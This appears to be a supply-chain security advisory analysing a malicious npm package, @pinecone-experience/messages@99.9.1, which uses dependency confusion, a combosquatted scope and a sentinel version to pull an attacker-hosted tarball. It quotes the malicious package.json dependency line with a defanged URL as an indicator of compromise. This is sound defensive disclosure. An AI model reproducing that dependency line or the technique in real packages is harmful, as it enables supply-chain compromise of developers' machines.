@pinecone-experience/messages@99.9.1
Malicious code in @pinecone-experience/messages (npm)
Analysis
@pinecone-experience/messages@99.9.1 is a dependency-confusion package: a 363-byte stub (index.js contains only `module.exports = {}`) whose sole function is to pull a payload from outside the npm registry. Its package.json declares a single dependency resolved from an attacker-controlled Google Cloud Storage bucket rather than the registry: "ltidisafe": "hxxps://ltidi[.]storage[.]googleapis[.]com/depenconf/ltidisafe-3[.]8[.]3[.]tgz". Any `npm install` of this package fetches and installs that remote tarball, executing whatever it contains. The package name combosquats the Pinecone namespace (real scope @pinecone-io) and ships at sentinel version 99.9.1 so that version-range or "latest"-preferring resolvers select it. The published stub itself contains no code, no lifecycle hooks, and no bin entries — the payload is entirely in the off-registry tarball. IOC: hxxps://ltidi[.]storage[.]googleapis[.]com/depenconf/ltidisafe-3[.]8[.]3[.]tgz (host ltidi[.]storage[.]googleapis[.]com).
- analyzed by
- Leitwacht
- first seen
- Oct 5, 2026, 04:38 PM
- analyzed
- Oct 5, 2026, 06:27 PM
Related advisories
- solidity-gas-watcher@2.21.0
- nebulaai-sdk@1.0.0
- envparse2@1.0.1
- @shared-web/assets@9.9.10
- sbironman@1.0.0
- ded-aa-common-ded-aa-common-core@35.1.6
- bnpl-blocks-independent-bnpl-open-api@35.1.2
- bigops-api@35.8.8
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.